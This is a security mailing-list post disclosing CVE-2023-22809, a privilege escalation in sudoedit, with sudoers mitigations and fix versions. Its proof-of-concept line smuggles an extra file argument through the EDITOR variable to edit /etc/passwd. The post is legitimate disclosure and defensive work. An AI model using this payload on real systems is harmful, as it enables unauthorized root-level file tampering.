[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] CVE-2023-22809: Sudoedit can edit arbitrary files
From: Matthieu Barjole <matthieu.barjole () synacktiv ! com>
Date: 2023-01-19 0:33:43
Message-ID: CAE-GootkXskaRKTmdPg1KsL3cm2oPq8DtL14MoupwX_CaVDeXw () mail ! gmail ! com
[Download RAW message or body]
Hello everyone,
While auditing Sudo, Synacktiv identified a privilege escalation in sudoedit
when a user is authorized to use it by the sudoers policy. This
vulnerability
was assigned CVE-2023-22809 and affects Sudo versions 1.8.0 through 1.9.12p1
inclusive.
## Analysis
The technical analysis can be found in the following security advisory:
https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf
## Proof of Concept
Assuming the following sudoers policy:
```
# cat /etc/sudoers
user ALL=(ALL:ALL) sudoedit /etc/motd
[...]
```
Arbitrary files such as `/etc/passwd` may also be edited as such:
```
EDITOR='vim -- /etc/passwd' sudoedit /etc/motd
```
## Mitigation
It is possible to prevent a user-specified editor from being used by
sudoedit by
adding the following line to the sudoers file.
```
Defaults!sudoedit env_delete+="SUDO_EDITOR VISUAL EDITOR"
```
To restrict the editor when editing specific files, a Cmnd_Alias can be
used,
for example:
```
Cmnd_Alias EDIT_MOTD = sudoedit /etc/motd
Defaults!EDIT_MOTD env_delete+="SUDO_EDITOR VISUAL EDITOR"
user ALL = EDIT_MOTD
```
## Fix
The issue was fixed in Sudo 1.9.12.p2.
## References
[1]
https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf
[2] https://www.sudo.ws/security/advisories/sudoedit_any/
[3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22809
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic